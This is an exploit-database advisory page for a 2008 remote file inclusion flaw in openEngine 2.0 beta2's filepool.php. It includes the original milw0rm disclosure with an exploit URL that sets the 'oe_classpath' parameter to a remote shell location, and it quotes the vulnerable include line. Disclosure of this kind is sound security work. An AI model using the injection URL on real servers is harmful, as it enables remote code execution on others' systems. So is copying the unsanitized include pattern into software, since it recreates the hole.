openEngine 2. 0 beta2 Remote File include Vulnerability

vendor:

openEngine

by:

Crackers_Child

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: openEngine

Affected Version From: 2. 0 beta2

Affected Version To: 2. 0 beta2

Patch Exists: Yes

Related CWE: N/A

CPE: a:openengine:openengine:2.0_beta2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

openEngine 2. 0 beta2 Remote File include Vulnerability

A vulnerability exists in openEngine 2. 0 beta2, which allows a remote attacker to include a file from a remote location. This is due to the application not properly sanitizing user-supplied input to the 'oe_classpath' parameter in 'filepool.php'. An attacker can exploit this vulnerability to include arbitrary files from remote locations, which can lead to the execution of arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of openEngine.

Source

Exploit-DB raw data:

**************************************************************************************

Author : By Crackers_Child
Contact: cashr00t@hotmail.com
Greetz : str0ke & All My Friends

**************************************************************************************
Script   : openEngine 2. 0 beta2 Remote File include Vulnerable
Download :http://downloads.sourceforge.net/openengine/openengine20_beta2.zip?modtime=1203083918&big_mirror=0

**************************************************************************************

Exploit : Site.com/script_path/cms/classes/openengine/filepool.php?oe_classpath=Shellz?


**************************************************************************************

Vulberable : include($oe_classpath."/openengine/thumbnail.php"); (filepool.php)


**************************************************************************************

N0te : Mubarek Ramazan Bayraminiz Kutlu Olsun Ey Musluman Halki :)
**************************************************************************************

# milw0rm.com [2008-09-26]